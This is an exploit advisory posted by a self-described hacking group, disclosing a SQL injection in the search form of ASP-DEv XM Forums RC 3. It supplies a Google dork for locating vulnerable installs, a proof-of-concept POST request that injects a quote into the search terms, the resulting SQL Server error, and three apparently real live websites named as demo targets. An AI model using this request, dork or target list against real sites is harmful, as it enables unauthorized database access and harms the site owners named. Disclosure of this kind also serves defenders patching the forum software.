####################################################### # # # ________ .__ __________________ # # \_ ___ \_______|__| _____ \_____ \______ \ # # / \ \/\_ __ \ |/ \ _(__ <| _/ # # \ \____| | \/ | Y Y \/ \ | \ # # \______ /|__| |__|__|_| /______ /____|_ / # # \/ \/ \/ \/ # # # ####################################################### # # # Exploit Title: ASP-DEv XM Forums RC 3 Remote Post Sql Injection Vulnerability # # Google Dork: Intext:"Powered by ASP-DEv XM Forums RC 3" # # Date: 08/29/2012 # # Author: Crim3R # # Site : Http://Ajaxtm.com/ # # Download Link : http://www.asp-dev.com/download.asp?did=1 # # Tested on: all # ================================== search form in ASP-DEv is Vulnerable to sql injection P0C : HTTP HEADERS : Host: www.chillifarm.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://www.chillifarm.com/chilli_forum/search.asp Cookie: TrackID=%7B54A35316%2D7519%2D405D%2D950A%2DA8CF50497150%7D; ASPSESSIONIDASSRDDBT=LPENAGHCNMNGMAOLEAJFMFOA Content-Type: application/x-www-form-urlencoded Content-Length: 46 Post Data -------------------- terms=%27&stype=1&in=1&forum=-1&ndays=0&mname= Http response : 28 Microsoft OLE DB Provider for SQL Server 8 21 error ' 8 80040e14 8 ' 1f 84 Unclosed quotation mark after the character string ') ORDER BY tbl_Categories.cOrder, tbl_Forums.fOrder, tbl_Topics.tLastPostDate'. 7 1f D3M0 : search query => post sql injection http://www.chillifarm.com/chilli_forum/search.asp http://forums.image-src.com/search.asp http://www.df.com/Imaging/Forum/search.asp ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - black.shadowes - hadihadi - iM4n - irsdl - the-0utl4w - Expl0its - Mormoroth - Mikili - Black.Spook - S3Ri0uS - Zalatan - Net.Edit0r - Ciph3r - A.u.r.A